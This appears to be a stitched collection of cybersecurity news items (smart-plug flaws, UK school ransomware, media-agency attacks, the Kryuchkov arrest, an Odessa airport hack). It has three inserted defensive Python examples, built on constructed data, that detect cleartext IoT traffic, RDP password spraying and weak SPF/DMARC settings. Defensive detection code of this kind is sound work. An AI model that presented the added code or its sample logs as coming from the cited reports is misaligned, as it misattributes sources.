With the increase in such cyber frauds, a YouTuber who was himself a victim stated that the overwhelming majority of influencers on social media are being exploited by fraudsters. The fraudsters typically pose as an established company or brand and approach influencers with lucrative publicity deals, offering to manage the ads on the influencers' behalf. Later, they collect personally identifiable information or passwords for the social media accounts and seize complete control of the website or handle used by the influencers. 

"We have lodged a complaint against an Instagrammer who specifically targeted women influencers. He texted asking them to join in an Instagram live. If they accepted and came on live, he would level baseless allegations. If they didn't agree to live as he was the stranger, he projected them as scammers," said Joe Praveen Michael, an event manager.

Smart Plugs Used by Cyber Criminals to Break into Victims Property


Inexpensive smart plugs are a serious cybersecurity threat and can be used by cybercriminals to hack into people's devices or even gain entry to their homes, experts say. 

Modern internet-connected devices are normally expected to send data over encrypted channels (HTTPS), use strong passwords, and follow appropriate safety practices. TechRadar reports that the Sonoff and Ener-J smart plugs did the opposite, leaving a serious security issue ready to be exploited. 

The security firm A&O IT Group documented its security analysis of two smart plugs, the Sonoff S26 and the Ener-J Wi-Fi, both cheap and widely available. 

These smart plugs, which customers can buy for as little as 10 dollars on Amazon, eBay, and AliExpress, can also be used by attackers to gain access to the target's Wi-Fi network. This is because the devices communicate with the router over port 80 using unencrypted HTTP traffic, and because they ship with default factory credentials.

Once attackers obtain the Wi-Fi password, they can join the target network and carry out all sorts of activities from it: intercepting video and audio feeds, controlling insecure smart devices, downloading confidential data, or even monitoring the traffic of many other devices. 

They may also use the Wi-Fi connection to download illicit content from the internet or to attack other users' computers with little risk of getting caught. This matters particularly when the victim has devices such as smart door locks or video surveillance on the same network: an intruder would then know how long the residents are out and might even break into the property. 

A&O IT Group says it has reported the vulnerabilities to both Sonoff and Ener-J, but it has yet to receive a response from either company. 

To mitigate the issue, CNX Software suggests that the quickest fix is to set up a guest SSID for IoT devices, so that they do not share a network with more important devices. 

The recent report on Eufy security cameras, whose video feeds were exposed before being fixed, and these smart plug vulnerabilities both remind users that network security rests on the security of every connected device, something to keep in mind when smart locks, smart cameras, or other sensitive devices share the same network.
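The following added Python example (not code from A&O IT Group, TechRadar or CNX Software) shows how a defender could check both of the points above against their own flow logs: which devices labelled as IoT are talking over unencrypted HTTP on port 80, and which of them still share a network segment with sensitive devices such as locks and cameras instead of sitting on a separate guest SSID. The device inventory, the segment list and the flow records are all constructed sample data.

```python
import ipaddress

# Constructed device inventory: ip -> (name, role). Roles are "iot",
# "sensitive" (locks, cameras), "user" and "infra".
INVENTORY = {
    "192.168.1.20": ("smart-plug-kitchen", "iot"),
    "192.168.1.21": ("smart-plug-lounge", "iot"),
    "192.168.1.30": ("front-door-lock", "sensitive"),
    "192.168.1.31": ("driveway-camera", "sensitive"),
    "192.168.1.50": ("laptop", "user"),
    "192.168.1.1": ("router", "infra"),
    "192.168.50.10": ("guest-plug", "iot"),  # already moved to a guest SSID
}

# Constructed layer-3 segments: the main LAN and the guest network.
SEGMENTS = [ipaddress.ip_network("192.168.1.0/24"),
            ipaddress.ip_network("192.168.50.0/24")]

# Constructed flow records: (src_ip, dst_ip, dst_port, protocol, tls_seen)
FLOWS = [
    ("192.168.1.20", "192.168.1.1", 80, "tcp", False),   # plug -> router, cleartext
    ("192.168.1.21", "203.0.113.5", 443, "tcp", True),   # plug -> cloud over TLS
    ("192.168.1.50", "198.51.100.7", 80, "tcp", False),  # laptop cleartext, not IoT
    ("192.168.50.10", "203.0.113.5", 443, "tcp", True),  # guest plug over TLS
]


def cleartext_iot_flows(flows, inventory):
    """Return (device, src, dst, port) for IoT devices sending unencrypted HTTP
    on port 80, the behaviour the post describes for the two plugs."""
    hits = []
    for src, dst, port, proto, tls in flows:
        name, role = inventory.get(src, ("unknown", "unknown"))
        if role == "iot" and proto == "tcp" and port == 80 and not tls:
            hits.append((name, src, dst, port))
    return hits


def segment_of(ip, segments):
    """Return the configured segment containing ip, or None if unknown."""
    addr = ipaddress.ip_address(ip)
    for net in segments:
        if addr in net:
            return net
    return None


def shared_segment_risks(inventory, segments):
    """Return (iot_device, sensitive_device, segment) for every IoT device that
    still shares a segment with a lock, camera or other sensitive device."""
    by_segment = {}
    for ip, (name, role) in inventory.items():
        by_segment.setdefault(segment_of(ip, segments), []).append((name, role))
    risks = []
    for net, devices in by_segment.items():
        iot = [n for n, r in devices if r == "iot"]
        sensitive = [n for n, r in devices if r == "sensitive"]
        for i in iot:
            for s in sensitive:
                risks.append((i, s, str(net)))
    return risks


if __name__ == "__main__":
    for hit in cleartext_iot_flows(FLOWS, INVENTORY):
        print("cleartext HTTP from IoT device:", hit)
    for risk in shared_segment_risks(INVENTORY, SEGMENTS):
        print("IoT device shares segment with sensitive device:", risk)
```

The guest plug on 192.168.50.0/24 produces no finding in the second check, which is exactly the outcome the guest SSID recommendation is meant to achieve; the kitchen plug is flagged by both checks because it is both talking in cleartext and sitting next to the door lock and the camera.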

Ransomware Attacks Targeting UK’s Education Sector Increased, says NCSC


According to the warning by GCHQ's cybersecurity arm, NCSC, there has been a substantial spike in the number of ransomware attacks targeting the education sector over the last month, just as schools were getting ready to resume in-person classes. 

Ransomware attacks on the UK education sector have been on the rise, according to a new report. This includes developments seen in August and September 2020, along with attacks that have occurred since February 2021. It also offers mitigation recommendations to help in the defense of this sector. 

According to the report, senior leaders must recognize the magnitude of the threat and the ability of the ransomware to cause serious harm to their organizations in terms of information exposure and access to important services. 

Ransomware encrypts servers and files, making it impossible for organizations to provide services. Cybercriminals anticipate that the pressure on schools and colleges to keep teaching will lead targeted organizations to give in to extortion demands and pay a bitcoin ransom in return for the decryption key needed to recover the network. More importantly, cybercriminals have begun to threaten that if the ransom is not paid, they will publish confidential data taken from the network during the attack. Many high-profile cases have already occurred in which cybercriminals carried out that threat by exposing confidential data to the public, mostly via "name and shame" websites on the darknet. 

"In recent incidents affecting the education sector, ransomware has led to the loss of student coursework, school financial records, as well as data relating to COVID-19 testing," the agency said. 

Ransomware attacks can be crippling to businesses, taking a considerable period for victims to recover and restore vital services. These activities can also be high-profile in nature, gaining a lot of attention from the public and the media. 

There are many ways for ransomware attackers to gain entry to a victim's network. Remote Desktop Protocol (RDP) is one of the most commonly used protocols for remote desktop activities, according to the NCSC, allowing staff to access their office desktop computers or servers from a remote device over the internet. Ransomware attackers often use insecure RDP and virtual private networks (VPN) configurations to gain initial access to victims' computers. 

"This is a growing threat and we strongly encourage schools, colleges, and universities to act on our guidance and help ensure their students can continue their education uninterrupted", says NCSC. 

To protect against malware and ransomware threats, the NCSC suggests that organizations adopt a "defence in depth" approach. Having an effective vulnerability management plan and deploying security fixes, protecting remote web services with multi-factor authentication, and installing and enabling anti-virus software are all among the NCSC's cybersecurity guidelines for schools, colleges, and universities to secure their networks against ransomware attacks. 
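As an added example of the detection side of the RDP point above (it is not code from the NCSC report), this Python snippet parses constructed Windows-style logon records (Event ID 4625 for a failed logon, 4624 for a successful one, logon type 10 for RemoteInteractive, i.e. RDP) and flags a source IP that crosses a failure threshold inside a sliding window, noting when a successful logon from the same source follows the burst. The line format, IP addresses and user names are all constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log lines in a simple one-line-per-event format. The event IDs
# and logon type are the real Windows values; everything else is made up.
LOG_LINES = """\
2021-03-01T02:14:05Z EventID=4625 LogonType=10 User=administrator SrcIP=203.0.113.9
2021-03-01T02:14:07Z EventID=4625 LogonType=10 User=admin SrcIP=203.0.113.9
2021-03-01T02:14:09Z EventID=4625 LogonType=10 User=staff SrcIP=203.0.113.9
2021-03-01T02:14:12Z EventID=4625 LogonType=10 User=teacher SrcIP=203.0.113.9
2021-03-01T02:14:15Z EventID=4625 LogonType=10 User=it-support SrcIP=203.0.113.9
2021-03-01T02:14:20Z EventID=4624 LogonType=10 User=it-support SrcIP=203.0.113.9
2021-03-01T08:00:01Z EventID=4625 LogonType=10 User=jsmith SrcIP=10.0.0.15
2021-03-01T08:30:00Z EventID=4624 LogonType=10 User=jsmith SrcIP=10.0.0.15
2021-03-01T09:00:00Z EventID=4624 LogonType=2 User=jsmith SrcIP=-
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<event>\d+) LogonType=(?P<ltype>\d+) "
    r"User=(?P<user>\S+) SrcIP=(?P<src>\S+)$"
)


def parse_line(line):
    """Turn one log line into a dict, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "event": int(m["event"]),
        "ltype": int(m["ltype"]),
        "user": m["user"],
        "src": m["src"],
    }


def detect_rdp_bruteforce(lines, threshold=5, window=timedelta(minutes=10)):
    """Flag sources with >= threshold failed RDP logons (4625, type 10) inside
    a sliding window, and record a later RDP success from the same source."""
    failures = defaultdict(deque)  # src -> deque of (timestamp, user)
    alerts = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["ltype"] != 10:
            continue  # ignore malformed lines and non-RDP logons
        q = failures[ev["src"]]
        while q and ev["ts"] - q[0][0] > window:
            q.popleft()  # drop failures that fell out of the window
        if ev["event"] == 4625:
            q.append((ev["ts"], ev["user"]))
            if len(q) >= threshold:
                a = alerts.setdefault(ev["src"], {"failed": 0, "users": [],
                                                  "success_after": None})
                a["failed"] = max(a["failed"], len(q))
                a["users"] = sorted({u for _, u in q})
        elif ev["event"] == 4624 and ev["src"] in alerts:
            # a success right after a burst of failures is the case to escalate
            alerts[ev["src"]]["success_after"] = ev["user"]
    return alerts


if __name__ == "__main__":
    for src, info in detect_rdp_bruteforce(LOG_LINES.splitlines()).items():
        print(src, info)
```

The user-spray pattern (one failure each against several accounts) is reported alongside the count, because a per-account lockout policy never triggers on it; only a per-source view catches it, which is why the detection keys on the source address.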

Are Media Agencies the Next Target of Cybercriminals?


There is no denying that cybercriminals have long exploited people's trust in media agencies. Recent events, however, have seen a remarkable surge in cybercriminals using every possible avenue to target media agencies.

Aside from direct attacks, they have even misused brand names to create counterfeit identities, which are then used to target 'potential victims'.

A couple of incidents throw light upon how and why these threat actors have set their sights on the media industry.

Some of them have been directly targeted generally through ransomware attacks.

Ritzau, the biggest independent news agency in Denmark, was targeted by a ransomware attack, prompting the compromise and encryption of more than one-fourth of its 100 network servers.

The computer servers at the Press Trust of India were also attacked by LockBit ransomware, which kept the agency from delivering news to its subscribers.

A few attackers very cleverly utilize the 'pretense' of media agencies to plan out their attacks.

Some time back, TA416 was found carrying out spear-phishing attacks by impersonating journalists from the Union of Catholic Asia News, targeting a range of victims including diplomats in Africa and people in the Vatican.

Another incident happened when the U.S. seized 27 domain names that were utilized by Iran's Islamic Revolutionary Guard Corps (IRGC) for carrying out secretive influence campaigns, in which a few domains were suspected to be veritable media outlets.

OceanLotus has consistently set up and operated websites posing as news, activist, or anti-corruption sites. It has also compromised several Vietnamese-language news websites and used them to load an OceanLotus web profiling framework.

With these events in mind, experts recommend adequate safety measures, such as frequent data backups, anti-malware solutions, and implementing Domain-based Message Authentication, Reporting & Conformance (DMARC).

Furthermore, recommendations were made on carrying out tests to distinguish and eliminate the risks of domain spoofing.
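To make the DMARC and spoofing-test recommendations concrete, here is an added Python example (not code from any of the organisations mentioned) that parses an SPF and a DMARC TXT record, assumed to have already been fetched from DNS, and reports the weaknesses that leave a domain open to spoofing, such as a permissive SPF terminator or a DMARC policy of p=none. The sample records and the domain example.org are constructed.

```python
def parse_dmarc(record):
    """Parse 'v=DMARC1; p=reject; rua=...' into a tag -> value dict."""
    tags = {}
    for part in record.split(";"):
        part = part.strip()
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def assess_spoofing_posture(spf_record, dmarc_record):
    """Return a list of findings; an empty list means SPF and DMARC together
    let receivers reject mail that forges the domain."""
    findings = []

    # SPF: what happens to a sender that is not listed?
    if spf_record is None or not spf_record.lower().startswith("v=spf1"):
        findings.append("no SPF record: any host may claim to send for this domain")
    else:
        mech = spf_record.split()[-1].lower()
        if mech in ("+all", "all"):
            findings.append("SPF ends with +all: every sender passes")
        elif mech == "?all":
            findings.append("SPF ends with ?all (neutral): unlisted senders are not penalised")
        elif mech == "~all":
            findings.append("SPF ends with ~all (softfail): enforcement depends on DMARC")
        elif not mech.endswith("all"):
            findings.append("SPF has no 'all' mechanism: unlisted senders get a neutral result")

    # DMARC: is there a policy, and is it actually enforced?
    if dmarc_record is None:
        findings.append("no DMARC record: receivers cannot apply a spoofing policy")
        return findings
    tags = parse_dmarc(dmarc_record)
    if tags.get("v", "").upper() != "DMARC1":
        findings.append("malformed DMARC record (missing v=DMARC1)")
    policy = tags.get("p", "").lower()
    if policy == "none":
        findings.append("DMARC p=none: spoofed mail is only reported, never rejected")
    elif policy not in ("quarantine", "reject"):
        findings.append("DMARC policy missing or invalid")
    pct = tags.get("pct", "100")
    if pct.isdigit() and int(pct) < 100:
        findings.append(f"DMARC pct={pct}: policy applies only to a sample of mail")
    if "rua" not in tags:
        findings.append("no rua= address: aggregate reports on spoofing attempts are not collected")
    return findings


if __name__ == "__main__":
    # Constructed records for example.org: a weak pair and a hardened pair.
    weak = ("v=spf1 include:_spf.example.org ~all",
            "v=DMARC1; p=none; rua=mailto:dmarc@example.org")
    strong = ("v=spf1 include:_spf.example.org -all",
              "v=DMARC1; p=reject; rua=mailto:dmarc@example.org; adkim=s; aspf=s")
    for label, (spf, dmarc) in (("weak", weak), ("strong", strong)):
        print(label, assess_spoofing_posture(spf, dmarc) or ["no findings"])
```

A domain that publishes DMARC with p=none is the common halfway state: it receives aggregate reports about who is forging it, which is useful for the monitoring phase, but receivers still deliver the forged mail, so the journalist-impersonation lures described above would still reach inboxes.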


Russian citizen arrested in the United States on charges of organizing a cyber crime


According to the Ministry of Justice, 27-year-old Yegor Kryuchkov tried to pay $1 million to an employee of a Nevada company in order to introduce malware into its computer network. When the FBI joined the investigation, the Russian tried to flee the United States.

A Federal Court in Los Angeles has arrested a Russian citizen, Yegor Kryuchkov, on charges of conspiring to commit cybercrime. This was reported by the press service of the US Department of Justice.

According to the Department, between July 15 and August 22 this year, 27-year-old Kryuchkov tried to bribe an employee of an unnamed American company located in the state of Nevada. The statement claims that the Russian offered him $1 million to take part in the fraudulent scheme.

The Ministry of Justice reported that Kryuchkov allegedly planned to load malicious software into the computer system of this company. This would allow him and his associates to gain unhindered access to company data.

Last week, Kryuchkov was contacted by the Federal Bureau of Investigation (FBI), after which he left Reno (Nevada) and went to Los Angeles in order to leave the United States. The Russian, according to the Department, asked his friend to buy him a plane ticket.

Kryuchkov was detained in Los Angeles on August 22. According to the Ministry of Justice, the Russian entered the United States on a tourist visa.

The Russian Embassy in the United States said that diplomats are aware of Kryuchkov's arrest. "We will contact the Russian in the near future to find out the problem. We will provide him with the necessary consular and legal assistance,” said the diplomatic mission.

The Russians were offered $10 million from the State Department for information about Russian hackers

Residents of Russia began to receive SMS about a way to get $10 million from the US State Department. In the messages, Russians are offered this money for information about the interference of Russian hackers in the American elections.

Residents of various Russian cities have posted such SMS messages on social networks. Among them is Yekaterinburg city Duma deputy Timofey Zhukov, who published a screenshot of such a message in his Telegram channel. "The US State Department is offering up to $10 million for information about interference in the US election. If you have information, please contact us," said the SMS.

The link in the message leads to a verified Twitter account of the US State Department's Rewards for Justice program. According to the hashtag of the same name, Election_Reward, dozens of messages of the Department's program were published on Twitter in different languages of the world, including Russian.

Experts noted that the message was sent to Russians through the CentrSoobsh service, which fraudsters usually use to send spam or fake SMS messages in order to hijack accounts.

Earlier, US Secretary of State Mike Pompeo announced the start of this program. He promised that Washington will pay the amount for information about persons interfering in the elections. Pompeo mentioned that the program applies to both Russia and other malicious states.

Russian Foreign Ministry spokeswoman Maria Zakharova remarked that if the US really starts paying everyone up to 10 million dollars for such information, the State Department's website "will break down from denunciations of neighbours."

Federation Council senator Frants Klintsevich called such actions an illusion and a provocation that carries danger. He added that the messages are sent not by the US itself but by emissaries with money.

According to him, those who send the messages must be found so that the matter can be brought to its logical conclusion. Moreover, if necessary, the Russian Federation needs to change its legislation, as such actions are an attempt to destabilize the situation in the country.

Indian Organizations Suffer the Most in Public Cloud Security Incidents



In a survey of 26 countries on public cloud security incidents, India emerges as the nation that endured the hardest hits last year, with 93 percent of the country's organizations encountering such a problem.

The survey covered more than 3,500 IT managers across 26 nations in Europe, the Americas, Asia Pacific, the Middle East, and Africa that currently host data and workloads in the public cloud.

The cybersecurity incidents that Indian organizations suffered most included ransomware (53 percent) and other malware (49 percent), exposed data (49 percent), compromised accounts (48 percent), and cryptojacking (36 percent), said the report titled "The State of Cloud Security 2020" by cybersecurity company Sophos.

Europeans seem to have suffered the fewest cloud security incidents, an indication that compliance with General Data Protection Regulation (GDPR) requirements is helping to protect organizations from being compromised.

However, India still hasn't enforced a data protection law.

Chester Wisniewski, Principal Research Scientist at Sophos said in a statement, "Ransomware, not surprisingly, is one of the most widely reported cybercrimes in the public Cloud."

"The recent increase in remote working provides extra motivation to disable Cloud infrastructure that is being relied on more than ever, so it's worrisome that many organizations still don't understand their responsibility in securing Cloud data and workloads," Wisniewski added later.

"Cloud security is a shared responsibility, and organizations need to carefully manage and monitor Cloud environments in order to stay one step ahead of determined attackers."

According to the report, more than 55 percent of Indian organizations and businesses revealed that cybercriminals obtained access through the stolen Cloud provider account credentials.

Despite this, only 29 percent said that managing access to cloud accounts is a top area of concern. Meanwhile, 'accidental exposure' continues to plague organizations, with misconfigurations exploited in 44 percent of reported attacks on Indian organizations.

With 76 percent of organizations using the public cloud, detection and response is the leading cloud security concern for IT managers in India, while data security remains the top concern for organizations worldwide.

Police found Ukrainian hackers who insulted Greta Thunberg in Odessa


Attackers broke into the Odessa airport's information terminal and used it to insult the eco-activist.
Law enforcement authorities in Odessa (Ukraine) said that they have identified the hackers of the Odessa airport information system who displayed images with insulting and obscene language aimed at eco-activist Greta Thunberg on the airport's information board.

According to police, on February 25, officers with the support of the special forces unit of the National Police of Ukraine searched the houses of the participants and founders of the Ukrainian Cyber Alliance public organization. The search was authorized by a decision of the Odessa court. The seized equipment was sent for examination. Law enforcement officers opened a criminal case on the fact of unauthorized interference in the work of the Odessa terminal. The attackers face imprisonment for a term of three to six years.

Ukrainian Cyber Alliance associates such actions of the National Police of Ukraine with political pressure on its activists.

It is worth noting that the Ukrainian Cyber Alliance is a community of Ukrainian cyber-activists that emerged in the spring of 2016 from the merger of two groups of cyber-activists, FalconsFlame and Trinity. Later, the cyber-activist group RUH8 and individual cyber-activists from the CyberHunta group joined the Alliance.

The hack of the Odessa airport information system took place in October last year, when a new terminal had just been installed in the renovated hall of the Odessa airport. Hackers displayed a photo of the Swedish eco-activist with the caption "F*** you, Greta" on the new terminal.

Recall that Time magazine named 16-year-old Swedish eco-activist Greta Thunberg its "Person of the Year". She began her climate campaign in the late summer of 2018. Every Friday, the girl held a solo picket outside the Swedish Parliament with a poster reading "School strike for climate", and a year later similar pickets were being staged around the world.